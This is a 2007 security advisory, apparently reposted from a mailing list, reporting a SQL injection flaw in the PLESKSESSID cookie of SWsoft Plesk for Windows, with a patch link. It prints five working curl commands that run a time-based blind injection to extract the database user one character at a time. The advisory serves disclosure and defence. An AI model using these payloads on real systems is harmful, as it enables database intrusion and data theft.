RE: ScanAlert Security Advisory

HackerSafe Labs - Security Advisory
http://www.hackersafelabs.com  

SWsoft Plesk for Windows - SQL Injection Vulnerability

Date: 9-11-07
Vendor: www.swsoft.com
Package: Plesk for Windows
Versions: v7.6.1, v8.1.0, v8.1.1, v8.2.0 Vendor Demo: https://plesk8.1win.demo.swsoft.com:8443/login.php3 Credit: Nick I Merritt

Risk:
Related Exploit Range: Remote
Attack Complexity: Medium
Level of Authentication Needed: Not Required Confidentiality Impact: Major
Integrity Impact: Major
Availability Impact: Major

Overview:
SWsoft Plesk is a comprehensive control panel solution used by leading hosting providers worldwide for shared, virtual and dedicated hosting.

Vulnerability:
A SQL injection vulnerability exists in the Plesk application. Please see the following:

SQL Injection Page 1: "login.php3"
SQL Injection Page 2: "auth.php3"
SQL Injection Cookie Parameter: "PLESKSESSID"

Example: (Will extract the database user)

1. Delay=5224.3877 Curl.exe -k "https://www.???.com:8443/login.php3" --cookie
   "PLESKSESSID=1' union select if
   (substring(user,1,1)=char(97),BENCHMARK(3000000,MD5(CHAR(1))),null),2,3 from mysql.user/*"
2. Delay=5165.3031 Curl.exe -k "https://www.???.com:8443/login.php3" --cookie
   "PLESKSESSID=1' union select if
   (substring(user,2,1)=char(100),BENCHMARK(3000000,MD5(CHAR(1))),null),2,3 from mysql.user/*"
3. Delay=5158.9512 Curl.exe -k "https://www.???.com:8443/login.php3" --cookie
   "PLESKSESSID=1' union select if
   (substring(user,3,1)=char(109),BENCHMARK(3000000,MD5(CHAR(1))),null),2,3 from mysql.user/*"
4. Delay=5224.0980 Curl.exe -k "https://www.???.com:8443/login.php3" --cookie
   "PLESKSESSID=1' union select if
   (substring(user,4,1)=char(105),BENCHMARK(3000000,MD5(CHAR(1))),null),2,3 from mysql.user/*"
5. Delay=5241.5251 Curl.exe -k "https://www.???.com:8443/login.php3" --cookie
   "PLESKSESSID=1' union select if
   (substring(user,5,1)=char(110),BENCHMARK(3000000,MD5(CHAR(1))),null),2,3 from mysql.user/*"

Do you need help?

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related securityfocus.com Links bugtraq certification focus-bsd focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics incidents libnet linux-secnews ms-secnews pen-test secpapers secprog sectools secureshell security-basics securityjobs sf-news vuln-dev webappsec Request more information about Pantek

Solution: Apply the following patches - http://kb.swsoft.com/en/2159 Received on Wed Sep 12 11:15:28 2007